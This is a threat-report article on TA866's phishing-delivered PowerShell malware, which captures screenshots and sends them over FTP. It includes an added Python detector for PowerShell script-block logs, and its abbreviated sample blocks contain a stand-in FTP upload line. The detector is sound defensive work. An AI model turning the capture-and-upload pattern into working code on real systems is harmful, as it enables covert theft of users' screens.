The Python malware reported by Cyble is designed to capture screenshots on the targeted systems and transfer them to a remote server through FTP (File Transfer Protocol).
FTP enables files and folders to be transferred from a host (targeted system) to another host via a TCP-based network, like the Internet.
The threat actors behind the campaign are the notorious TA866, which has a history of targeting Tatar language speakers and utilizing Python malware to conduct their operations.
How Does TA866 Use Python Malware?
According to CRIL, the threat actor TA866 began using this new Python malware around Tatar Republic Day, and the attacks continued until the end of August.
The report claims that the threat actor known as TA866 uses a PowerShell script “responsible for taking screenshots and uploading them to a remote FTP server.”
Threat actors select victims for the Python malware attack through phishing emails. These emails carry a malicious RAR file.
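The report describes the two halves of the script's behaviour, capturing the screen and uploading the result over FTP, which is also how a defender can spot it: either behaviour alone in a PowerShell script block is unusual, and both together in one block is a strong signal. The following is an added example, not code from Cyble, CRIL or the report, that scores PowerShell script-block log text on those two behaviours. The indicator patterns are my own assumptions (not IoCs from the report), and the sample blocks are constructed and deliberately abbreviated, with a placeholder in place of any FTP host.

```python
import re
from dataclasses import dataclass, field

# Indicator patterns for the two behaviours the report attributes to the script.
# These are assumed, illustrative indicators, not IoCs published by Cyble/CRIL.
SCREEN_CAPTURE_PATTERNS = [
    r"CopyFromScreen",                 # System.Drawing.Graphics screen grab
    r"System\.Windows\.Forms\.Screen",  # screen geometry lookup
    r"PrimaryScreen",
]
FTP_UPLOAD_PATTERNS = [
    r"ftp://",                         # FTP URI in a string
    r"FtpWebRequest",                  # .NET FTP client class
    r"WebRequestMethods\.Ftp",
    r"\.UploadFile\(",                 # WebClient.UploadFile
]

# Constructed sample script-block texts (e.g. from PowerShell script block
# logging). They are abbreviated fragments, not working scripts.
SAMPLE_SCRIPT_BLOCKS = [
    ("sb-1", "Add-Type -AssemblyName System.Windows.Forms\n"
             "$g.CopyFromScreen(...)   # abbreviated\n"
             "$wc.UploadFile('ftp://FTP-HOST-PLACEHOLDER/...', $png)"),
    ("sb-2", "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB"),
    ("sb-3", "$wc.DownloadFile('https://example.invalid/u.zip', $out)"),
    ("sb-4", "[System.Windows.Forms.Screen]::PrimaryScreen.Bounds"),
]


@dataclass
class Finding:
    block_id: str
    severity: str                      # "high", "medium" or "none"
    screen_hits: list = field(default_factory=list)  # matched patterns
    ftp_hits: list = field(default_factory=list)


def _matches(patterns, text):
    """Return the patterns from `patterns` that occur in `text`."""
    return [p for p in patterns if re.search(p, text, re.IGNORECASE)]


def score_script_block(block_id: str, text: str) -> Finding:
    """Score one script block: both behaviours -> high, one -> medium."""
    screen = _matches(SCREEN_CAPTURE_PATTERNS, text)
    ftp = _matches(FTP_UPLOAD_PATTERNS, text)
    if screen and ftp:
        severity = "high"      # capture and FTP upload in the same block
    elif screen or ftp:
        severity = "medium"    # one half of the chain; worth triage
    else:
        severity = "none"
    return Finding(block_id, severity, screen, ftp)


def scan(blocks):
    """Score a sequence of (block_id, text) pairs."""
    return [score_script_block(block_id, text) for block_id, text in blocks]


if __name__ == "__main__":
    for finding in scan(SAMPLE_SCRIPT_BLOCKS):
        if finding.severity != "none":
            print(finding.block_id, finding.severity,
                  finding.screen_hits, finding.ftp_hits)
```

In practice the input would be the ScriptBlockText field of script block logging events rather than the constructed list; the scoring keeps the two behaviour families separate so that an analyst can see which half of the chain fired, and a "medium" on screen capture alone is still worth a look because the upload may live in a separate block.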
The file includes two innocuous files: a video file an
[…]